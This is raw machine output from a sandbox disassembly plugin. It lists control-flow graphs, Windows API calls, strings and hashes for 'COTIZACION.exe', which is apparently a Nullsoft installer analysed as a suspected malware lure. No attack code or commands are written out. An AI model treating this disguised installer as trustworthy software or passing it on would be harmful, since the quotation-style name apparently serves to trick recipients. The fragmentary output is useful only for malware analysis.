                                                                                                control_flow_graph 146 404f70-404f89 147 405111-405123 146->147 148 404f8f-404f95 146->148 149 405125-405165 GetDlgItem * 2 call 4054f8 SetClassLongW call 401533 147->149 150 40516b-40517f 147->150 148->147 151 404f9b-404f9e 148->151 149->150 153 405181-405183 150->153 154 4051bd-4051c2 call 4054c6 150->154 155 404fa0-404fb5 SetWindowPos 151->155 156 404fba-404fbd 151->156 158 4051b5-4051b7 153->158 159 405185-405190 call 401399 153->159 170 4051c7-4051e6 154->170 160 4050fd 155->160 162 40500d-405013 156->162 163 404fbf-404fde ShowWindow 156->163 158->154 168 405488 158->168 159->158 187 405192-4051b0 SendMessageW 159->187 169 405101-40510c call 405739 160->169 164 405015-40502a DestroyWindow 162->164 165 40502f-405032 162->165 163->169 171 404fe4-404ffa GetWindowLongW 163->171 172 40546c-405473 164->172 173 405034-405042 SetWindowLongW 165->173 174 405047-40504d 165->174 176 40548a-405491 168->176 169->176 179 4051e8-4051f3 call 401533 170->179 180 4051f9-4051ff 170->180 171->169 181 405000-405008 ShowWindow 171->181 172->168 183 405475-405477 172->183 173->176 174->160 186 405053-40506d GetDlgItem 174->186 179->180 184 405205-405207 180->184 185 405448-405461 DestroyWindow EndDialog 180->185 181->169 183->168 190 405479-405482 ShowWindow 183->190 184->185 191 40520d-405264 call 405e98 call 4054f8 * 3 GetDlgItem 184->191 194 405467 185->194 192 405092-405097 186->192 193 40506f-405088 SendMessageW IsWindowEnabled 186->193 187->176 190->168 222 405272-4052c1 ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 191->222 223 405266-40526e 191->223 197 405099-40509a 192->197 198 40509c-40509f 192->198 193->168 196 40508e 193->196 194->172 196->192 200 4050dd-4050e2 call 405936 197->200 201 4050a1-4050a8 198->201 202 4050ae-4050b1 198->202 200->169 205 4050e4-4050f7 SendMessageW 201->205 206 4050aa-4050ac 201->206 202->205 207 4050b3-4050ba 202->207 205->160 206->200 210 4050ca-4050d3 call 401533 207->210 211 4050bc-4050c8 call 401533 207->211 210->169 219 4050d5 210->219 218 4050db 211->218 218->200 219->218 224 4052c3-4052c4 222->224 225 4052c6 222->225 223->222 226 4052c7-4052f2 GetSystemMenu EnableMenuItem SendMessageW 224->226 225->226 227 4052f4-405309 SendMessageW 226->227 228 40530b 226->228 229 405311-405357 call 4054e1 call 405cf9 call 406af8 lstrlenW call 405e98 SetWindowTextW call 401399 227->229 228->229 229->170 240 40535d-40535f 229->240 240->170 241 405365-405369 240->241 242 405388-40539c DestroyWindow 241->242 243 40536b-405371 241->243 242->194 245 4053a2-4053cf CreateDialogParamW 242->245 243->168 244 405377-40537d 243->244 244->170 246 405383 244->246 245->172 247 4053d5-40542c call 4054f8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 245->247 246->168 247->168 252 40542e-405441 ShowWindow call 4054c6 247->252 254 405446 252->254 254->194
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAF
                                                                                                • ShowWindow.USER32(?), ref: 00404FD9
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404FEA
                                                                                                • ShowWindow.USER32(?,00000004), ref: 00405006
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 0040512D
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00405137
                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00405151
                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519F
                                                                                                • GetDlgItem.USER32(?,00000003), ref: 0040524E
                                                                                                • ShowWindow.USER32(00000000,?), ref: 00405277
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040528B
                                                                                                • KiUserCallbackDispatcher.NTDLL(?), ref: 0040529F
                                                                                                • EnableWindow.USER32(?), ref: 004052B7
                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CE
                                                                                                • EnableMenuItem.USER32(00000000), ref: 004052D5
                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E6
                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FD
                                                                                                • lstrlenW.KERNEL32(Misspending Setup: Installing,?,Misspending Setup: Installing,00000000), ref: 0040532E
                                                                                                  • Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,?), ref: 0040604E
                                                                                                • SetWindowTextW.USER32(?,Misspending Setup: Installing), ref: 00405346
                                                                                                  • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                                  • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                                • DestroyWindow.USER32(?,00000000), ref: 0040538E
                                                                                                • CreateDialogParamW.USER32(?,?,-007A8560), ref: 004053C2
                                                                                                  • Part of subcall function 004054F8: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405512
                                                                                                • GetDlgItem.USER32(?,000003FA), ref: 004053EB
                                                                                                • GetWindowRect.USER32(00000000), ref: 004053F2
                                                                                                • ScreenToClient.USER32(?,?), ref: 004053FE
                                                                                                • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405417
                                                                                                • ShowWindow.USER32(00000008,?,00000000), ref: 00405436
                                                                                                  • Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040547C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                                                                                • String ID: Misspending Setup: Installing
                                                                                                • API String ID: 162979904-1677686103
                                                                                                • Opcode ID: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
                                                                                                • Instruction ID: 456415ec42eff5e8f6a9a9f0208e2dc106d0a6226250255d67da48920511729f
                                                                                                • Opcode Fuzzy Hash: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
                                                                                                • Instruction Fuzzy Hash: 38D1C071904B10ABDB20AF21EE44A6B7B68FB89355F00853EF545B21E1CA3D8851CFAD

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 255 405a1c-405a37 call 4068c4 258 405a39-405a49 call 4065fd 255->258 259 405a4b-405a81 call 406955 255->259 268 405aa4-405acd call 40595d call 406616 258->268 264 405a83-405a94 call 406955 259->264 265 405a99-405a9f lstrcatW 259->265 264->265 265->268 273 405ad3-405ad8 268->273 274 405b65-405b6d call 406616 268->274 273->274 275 405ade-405af9 call 406955 273->275 280 405b7b-405ba9 LoadImageW 274->280 281 405b6f-405b76 call 405e98 274->281 279 405afe-405b07 275->279 279->274 282 405b09-405b0f 279->282 284 405c28-405c30 call 401533 280->284 285 405bab-405bd6 RegisterClassW 280->285 281->280 286 405b11-405b1f call 4065d4 282->286 287 405b22-405b30 lstrlenW 282->287 296 405ce2-405ce4 284->296 297 405c36-405c41 call 40595d 284->297 288 405bd8-405bda 285->288 289 405bdf-405c23 SystemParametersInfoW CreateWindowExW 285->289 286->287 293 405b32-405b40 lstrcmpiW 287->293 294 405b58-405b60 call 406534 call 406af8 287->294 295 405ce5-405cec 288->295 289->284 293->294 300 405b42-405b4c GetFileAttributesW 293->300 294->274 296->295 308 405c47-405c61 ShowWindow call 40617c 297->308 309 405cc9-405cd1 call 405842 297->309 303 405b52-405b53 call 406cee 300->303 304 405b4e-405b50 300->304 303->294 304->294 304->303 316 405c63-405c68 call 40617c 308->316 317 405c6d-405c7e GetClassInfoW 308->317 314 405cd3-405cd9 309->314 315 405ced-405cef call 401533 309->315 314->296 318 405cdb-405cdd call 401533 314->318 324 405cf4 315->324 316->317 321 405c80-405c94 GetClassInfoW RegisterClassW 317->321 322 405c96-405cb9 DialogBoxParamW call 401533 317->322 318->296 321->322 326 405cbe-405cc7 call 403cd6 322->326 324->324 326->295
                                                                                                APIs
                                                                                                  • Part of subcall function 004068C4: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                                  • Part of subcall function 004068C4: GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                                • lstrcatW.KERNEL32(1033,Misspending Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Misspending Setup: Installing,00000000,00000002,00000000,76F93420,00000000,76F93170), ref: 00405A9F
                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Misspending Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Misspending Setup: Installing,00000000,00000002,00000000), ref: 00405B23
                                                                                                • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Misspending Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Misspending Setup: Installing,00000000), ref: 00405B38
                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00405B43
                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\overlays\besvangredes), ref: 00405B8C
                                                                                                  • Part of subcall function 004065FD: wsprintfW.USER32 ref: 0040660A
                                                                                                • RegisterClassW.USER32(007A74E0), ref: 00405BD1
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE8
                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1D
                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405C4F
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,007A74E0), ref: 00405C7A
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,007A74E0), ref: 00405C87
                                                                                                • RegisterClassW.USER32(007A74E0), ref: 00405C94
                                                                                                • DialogBoxParamW.USER32(?,00000000,00404F70,00000000), ref: 00405CAF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\overlays\besvangredes$Call$Control Panel\Desktop\ResourceLocale$Misspending Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$tz
                                                                                                • API String ID: 1975747703-1876227926
                                                                                                • Opcode ID: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
                                                                                                • Instruction ID: 09b92c81f8f4ef2e2e9fd8d830fcc712f1cdd6db1c368b512ccdb95b409c048d
                                                                                                • Opcode Fuzzy Hash: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
                                                                                                • Instruction Fuzzy Hash: 31611370604604BEE7107B65AD42F2B366CEB46748F11813EF941B61E2EB3CA9108FAD

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 329 40154a-4015bd 330 402ea1 329->330 331 4015c3-4015c7 329->331 351 402ea5 330->351 332 4016c1-4016cf 331->332 333 4017c2-401e9e call 40303e call 4065ad 331->333 334 401684-4016aa 331->334 335 4015e6-4015ee 331->335 336 4018cb-4018d4 call 40303e call 406a34 331->336 337 40160c-40160d 331->337 338 4015ce-4015d0 331->338 339 4016ef-4016fb call 40303e SetFileAttributesW 331->339 340 4016af-4016bc call 4065fd 331->340 341 40182f-40184b call 40303e GetFullPathNameW 331->341 342 401711-401728 call 40303e call 406ba3 331->342 343 401633-40163a SetForegroundWindow 331->343 344 4017d3-4017f6 call 40303e * 3 MoveFileW 331->344 345 4015d5-4015d6 331->345 346 401618-40162e call 403002 Sleep 331->346 347 4015f9-401607 call 4030fd call 401399 331->347 348 40189b-4018b8 call 40303e SearchPathW 331->348 349 4018de-401904 call 40303e call 406de1 331->349 350 40163f-401645 331->350 369 4016d1-4016d5 ShowWindow 332->369 370 4016d9-4016e0 332->370 422 401bb2-401bb6 333->422 423 401ea4-401ea8 333->423 366 402ead-402eb7 334->366 352 4015f0-4015f7 PostQuitMessage 335->352 353 4015dc-4015e1 335->353 406 4018d9 336->406 358 40160e-401613 call 405d18 337->358 338->366 389 401701-401703 339->389 340->330 399 401857-40185d 341->399 400 40184d-401855 341->400 414 401784-40178e 342->414 415 40172a-40173f call 4065d4 342->415 343->330 430 401804-401808 344->430 431 4017f8-4017ff 344->431 371 4015d7 call 405d18 345->371 346->330 347->366 348->330 393 4018be-4018c6 348->393 417 401906-40190c call 406af8 349->417 418 40190e-401920 call 406af8 call 406534 lstrcatW 349->418 363 401671-40167f 350->363 364 401647 350->364 365 402eab 351->365 352->353 353->366 358->330 363->330 382 401657-40166c call 403002 364->382 383 401649-401650 364->383 365->366 369->370 370->330 386 4016e6-4016ea ShowWindow 370->386 371->353 382->330 383->382 386->330 389->330 401 401709-40170c 389->401 393->351 410 40187b 399->410 411 40185f-401862 399->411 409 40187f-401883 400->409 401->351 406->389 409->351 412 401889-401896 GetShortPathNameW 409->412 410->409 411->410 419 401864-40186c call 4065ad 411->419 412->351 426 401790-4017ab call 405d18 call 406af8 SetCurrentDirectoryW 414->426 427 4017bb-4017bd 414->427 436 401741-401745 415->436 437 401758-401759 call 405dfc 415->437 439 401925-40192d call 406d1b 417->439 418->439 419->400 442 40186e-401876 call 406af8 419->442 422->366 423->366 426->330 460 4017b1-4017b6 426->460 427->358 430->401 438 40180e-401816 call 4065ad 430->438 431->358 436->437 443 401747-40174e call 4064da 436->443 452 40175e-401760 437->452 438->401 456 40181c-40182a call 40621b 438->456 459 40192e-401931 439->459 442->410 443->437 461 401750-401751 call 405e1c 443->461 457 401762-401767 452->457 458 401775-40177e 452->458 456->358 463 401774 457->463 464 401769-401772 GetFileAttributesW 457->464 458->415 465 401780 458->465 466 401933-40193d call 4065ad 459->466 467 401964-401966 459->467 460->330 475 401756 461->475 463->458 464->458 464->463 465->414 477 401950-401960 466->477 478 40193f-40194e CompareFileTime 466->478 468 401968-401969 call 406b7b 467->468 469 40196e-401989 call 4068f9 467->469 468->469 480 401a18-401a49 call 405d18 call 403148 469->480 481 40198f-401991 469->481 475->452 477->467 478->477 494 401a52-401a5a SetFileTime 480->494 495 401a4b-401a50 480->495 482 401993-4019df call 406af8 * 2 call 405e98 call 406af8 call 406a86 481->482 483 4019fd-401a13 call 405d18 481->483 482->459 512 4019e5-4019e8 482->512 483->351 496 401a60-401a6d CloseHandle 494->496 495->494 495->496 496->330 498 401a73-401a76 496->498 500 401a78-401a87 call 405e98 lstrcatW 498->500 501 401a89-401a8c call 405e98 498->501 507 401a91-401a9c call 406a86 500->507 501->507 507->353 513 4019f2-4019f8 512->513 514 4019ea-4019ed 512->514 513->365 514->371
                                                                                                APIs
                                                                                                • PostQuitMessage.USER32(00000000), ref: 004015F1
                                                                                                • Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
                                                                                                • SetForegroundWindow.USER32 ref: 00401634
                                                                                                • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                                                                                                • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                                                                                • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                                                                                • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\overlays\besvangredes\Afbetaltes,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,00000000,000000F0,?,?,00000000,00000000), ref: 004017A3
                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\overlays\besvangredes\Afbetaltes,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\overlays\besvangredes\Afbetaltes,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                                                                                • SetFileTime.KERNELBASE(?,?,00000000,?,?,?,00000000,00000000,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A5A
                                                                                                • CloseHandle.KERNELBASE(?,?,?,00000000,00000000), ref: 00401A61
                                                                                                • lstrcatW.KERNEL32(Call,?,Call,000000E9,?,?,00000000,00000000), ref: 00401A82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp$C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll$C:\Users\user\overlays\besvangredes\Afbetaltes$Call
                                                                                                • API String ID: 3895412863-917698584
                                                                                                • Opcode ID: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
                                                                                                • Instruction ID: f97e61f8377ab9e25a0dd965f2557d34b91b3991d6c9f65f1b163fc05bb86adc
                                                                                                • Opcode Fuzzy Hash: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
                                                                                                • Instruction Fuzzy Hash: 6AD1D571644301ABC710BF66CD85E2B76A8AF86758F10463FF452B22E1DB7CD8019A6F

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 515 4033cb-403418 GetTickCount GetModuleFileNameW call 4068f9 518 403424-403454 call 406af8 call 406cee call 406af8 GetFileSize 515->518 519 40341a-40341f 515->519 527 403550-40355f call 403367 518->527 528 40345a 518->528 520 403623-40362a 519->520 533 403565-403567 527->533 534 40361e 527->534 530 40345e-403484 call 40311b 528->530 536 403616-40361d call 403367 530->536 537 40348a-403491 530->537 538 403598-4035c8 GlobalAlloc call 403131 call 403148 533->538 539 403569-403581 call 403131 call 406926 533->539 534->520 536->534 540 403512-403515 537->540 541 403493-4034ac call 406692 537->541 538->534 565 4035ca-4035dc 538->565 561 403586-403588 539->561 548 403517-40351e call 403367 540->548 549 40351f-403525 540->549 541->549 558 4034ae-4034b6 541->558 548->549 551 403527-403536 call 406e1a 549->551 552 40353a-403542 549->552 551->552 552->530 560 403548-40354c 552->560 558->549 564 4034b8-4034c0 558->564 560->527 561->534 566 40358e-403592 561->566 564->549 567 4034c2-4034ca 564->567 568 4035e4-4035e7 565->568 569 4035de 565->569 566->534 566->538 567->549 570 4034cc-4034d4 567->570 571 4035ea-4035f2 568->571 569->568 570->549 572 4034d6-4034f5 570->572 571->571 573 4035f4-40360d SetFilePointer call 406692 571->573 572->534 574 4034fb-403501 572->574 577 403612-403614 573->577 574->560 576 403503-40350c 574->576 576->549 578 40350e-403510 576->578 577->520 578->549
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 004033DE
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\COTIZACION.exe,00000400), ref: 004033FA
                                                                                                  • Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\COTIZACION.exe,80000000,00000003), ref: 004068FD
                                                                                                  • Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\COTIZACION.exe,C:\Users\user\Desktop\COTIZACION.exe,80000000,00000003), ref: 00403444
                                                                                                • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040359E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                • String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\COTIZACION.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                • API String ID: 2803837635-366774273
                                                                                                • Opcode ID: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
                                                                                                • Instruction ID: 8295773d5102a3db2c924d587f32f5b95c2827ef7f93a52122a4f4d2b553c90e
                                                                                                • Opcode Fuzzy Hash: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
                                                                                                • Instruction Fuzzy Hash: B951D371904300AFD720AF25DD81B1B7AA8BB8471AF10453FF955B62E1CB3D8E548B6E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
